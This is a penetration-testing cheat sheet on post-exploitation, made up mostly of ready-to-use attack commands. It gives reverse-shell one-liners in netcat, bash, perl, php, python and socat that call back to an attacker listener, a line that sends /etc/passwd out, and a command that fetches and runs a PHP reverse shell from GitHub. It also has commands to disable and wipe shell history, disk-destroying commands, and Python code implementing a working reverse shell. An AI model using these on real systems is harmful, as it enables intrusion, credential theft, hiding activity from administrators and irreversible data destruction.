
Post Exploitation

The post-exploitation phase establishes what control has been gained over the compromised machine and keeps that access available for later use (persistence, file transfer, and cleaning up afterwards).

Netcat Reverse Shells

Listener:

nc -lvp 4444

Target:

Windows: nc.exe 192.168.1.1 4444 -e cmd.exe
Linux: nc 192.168.1.1 4444 -e /bin/bash

192.168.1.1:4444 is the attacker's listener throughout this page. The -e option exists only in netcat-traditional and ncat; the OpenBSD nc shipped by most Linux distributions has no -e, so on such targets use one of the mkfifo or /dev/tcp one-liners below instead.

Reverse Shells

Listener:

nc -lvp 4444

Target:

bash -i >& /dev/tcp/192.168.1.1/4444 0>&1
perl -e 'use Socket;$i="192.168.1.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php -r '$sock=fsockopen("192.168.1.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.1 4444 >/tmp/f
0<&196; exec 196<>/dev/tcp/192.168.1.1/4444; sh <&196 >&196 2>&196
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.1:4444

All of these connect back to 192.168.1.1:4444 and attach a shell to the socket. The php line assumes the socket ends up as descriptor 3, which holds when the php process has only stdin, stdout and stderr open. The socat line allocates a pty on the target, so pair it with a socat listener rather than plain nc to get a fully interactive terminal.
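How the dup2-style one-liners work, as an added example that is not from the original page: a listener and a connect-back shell run in one Python process over loopback (the 127.0.0.1 address, the ephemeral port and the commands sent are assumptions made for the demo). The target side hands the connected socket to /bin/sh as stdin, stdout and stderr, exactly what the os.dup2 calls in the python line above do; the listener then drives the shell over the socket and reads until EOF.

```python
import socket
import subprocess
import threading

LHOST = "127.0.0.1"  # assumption: both ends on loopback so the demo runs offline


def start_listener(host=LHOST):
    """The 'nc -lvp' side: bind an ephemeral port and wait for the callback."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))  # port 0: let the OS choose a free port
    srv.listen(1)
    srv.settimeout(10)
    return srv, srv.getsockname()[1]


def reverse_shell(host, port):
    """The target side: connect back and give the socket to /bin/sh as fd 0, 1 and 2."""
    s = socket.create_connection((host, port))
    # Equivalent of the three os.dup2 calls in the python one-liner: the child
    # reads commands from the socket and writes stdout/stderr back into it.
    proc = subprocess.Popen(["/bin/sh"], stdin=s, stdout=s, stderr=s)
    proc.wait()
    s.close()  # drop our copy so the listener sees EOF once the shell is gone
    return proc.returncode


def operator_session(srv, script):
    """The attacker side: accept the callback, send commands, read until the shell exits."""
    conn, _ = srv.accept()
    conn.settimeout(10)
    conn.sendall(script.encode())
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:  # EOF: the remote shell exited and every copy of the socket closed
            break
        chunks.append(data)
    conn.close()
    return b"".join(chunks).decode(errors="replace")


def demo():
    """Run listener and 'target' in one process; returns the captured shell output."""
    srv, port = start_listener()
    target = threading.Thread(target=reverse_shell, args=(LHOST, port), daemon=True)
    target.start()
    # Constructed command script: prove we are executing on the target, then leave.
    out = operator_session(srv, "echo CONNECTED; echo $((6*7)); exit\n")
    target.join(10)
    srv.close()
    return out


if __name__ == "__main__":
    print(demo(), end="")
```

Because the shell's stdin is a socket rather than a terminal, it runs non-interactively; that is why the real one-liners pass -i and why tools like socat with a pty, or a python pty.spawn upgrade, are used afterwards.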

Send files

exec 3<>/dev/tcp/192.168.1.1/4444 && cat /etc/passwd>&3

/dev/tcp is implemented by bash itself, not by the kernel, so this works from a bash shell even when no netcat is installed on the target; a listener on the other end redirecting its input to a file (next section) receives the content.

Send Files through Netcat

Listener:

netcat -l 4444 > received_file

Target:

netcat 192.168.1.1 4444 < original_file

Netcat checks neither integrity nor completeness: compare the sha256sum of original_file and received_file on both ends. The listener only finishes at EOF, so the sender must close the connection; some netcat builds keep it open after the input is exhausted and have to be stopped by hand.

Listener:

netcat -l 4444 | tar xzvf -

Target:

tar -czf - * | netcat 192.168.1.1 4444

The * glob does not match dot-files; archive the directory itself rather than * if hidden files are needed.
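Netcat gives no confirmation that a file arrived intact or complete, and the receiver only knows the transfer is over when the sender closes its side. The following added example (not from the original page) replays the netcat file transfer above in Python over loopback, with a constructed random payload, an ephemeral port and sha256 checks on both ends as the assumed setup, so both sides can be seen and the hashes compared.

```python
import hashlib
import os
import socket
import tempfile
import threading

LHOST = "127.0.0.1"  # assumption: sender and receiver on loopback so the demo runs offline


def sha256_file(path):
    """Hash a file in chunks; run the same on both ends and compare."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def receive_file(srv, dest_path):
    """'netcat -l 4444 > received_file': take one connection, write bytes until EOF."""
    conn, _ = srv.accept()
    conn.settimeout(10)
    with conn, open(dest_path, "wb") as f:
        while True:
            chunk = conn.recv(65536)
            if not chunk:  # the sender closed its write side: transfer complete
                break
            f.write(chunk)
    return sha256_file(dest_path)


def send_file(host, port, src_path):
    """'netcat 192.168.1.1 4444 < original_file': stream the file, then signal EOF."""
    with socket.create_connection((host, port)) as s, open(src_path, "rb") as f:
        s.sendfile(f)
        s.shutdown(socket.SHUT_WR)  # without this the receiver never sees EOF
    return sha256_file(src_path)


def demo(size=300_000):
    """Transfer a constructed random file over loopback.

    Returns (sender_hash, receiver_hash, received_size).
    """
    tmp = tempfile.mkdtemp()
    src = os.path.join(tmp, "original_file")
    dst = os.path.join(tmp, "received_file")
    with open(src, "wb") as f:
        f.write(os.urandom(size))  # constructed sample payload, not a real file

    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((LHOST, 0))  # port 0: ephemeral port chosen by the OS
    srv.listen(1)
    srv.settimeout(10)
    port = srv.getsockname()[1]

    result = {}
    rx = threading.Thread(target=lambda: result.update(rx=receive_file(srv, dst)), daemon=True)
    rx.start()
    tx_hash = send_file(LHOST, port, src)
    rx.join(10)
    srv.close()
    return tx_hash, result.get("rx"), os.path.getsize(dst)


if __name__ == "__main__":
    sent, received, n = demo()
    print(n, "bytes,", "hashes match" if sent == received else "HASH MISMATCH")
```

The shutdown call is the step that netcat performs implicitly when its stdin hits EOF; if the sending side never closes, the receiver's loop above, like netcat -l, blocks forever with a partial file on disk.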

File upload in Windows with PowerShell

See: [Windows / DOS / PowerShell] File upload in command line

PHP webshells

php-webshells

wget -O /tmp/php_shell.php https://raw.githubusercontent.com/JohnTroony/php-webshells/master/php-reverse-shell.php && php -f /tmp/php_shell.php

php-reverse-shell.php is pentestmonkey's reverse shell; set its $ip and $port variables to the listener address before running it. Used this way it is executed by the PHP CLI on the target and connects back, so it needs no web server, only a php binary.

Covering the tracks

Avoiding history

Run these before anything else in the session, so that later commands are never written down:

export HISTFILE=
unset HISTFILE
set +o history

With HISTFILE empty or unset, bash has no file to write history to at logout; set +o history additionally stops the current shell from recording commands in memory.

Clear history

history -c
rm -rf .bash_history
touch .bash_history (invasive)

history -c drops what the current shell has already recorded in memory. Removing .bash_history (and re-creating it empty) also destroys the user's previous history, which is a noticeable change. None of this affects other logging: auditd, process accounting, or the history files of other shells are untouched.

Destroy

rm -rf /
find / -type f -exec {}
mkfs.ext3 /dev/sda
dd if=/dev/zero of=/dev/sda bs=1M

Current coreutils rm refuses to recurse from / unless --no-preserve-root is added. The find line is incomplete as given on this page: -exec needs a command before {} and a terminating \;. None of these operations is reversible, and they fall outside the rules of engagement of nearly every test.

Resources

escaping-restricted-linux-shells

kernel-exploits

static-binaries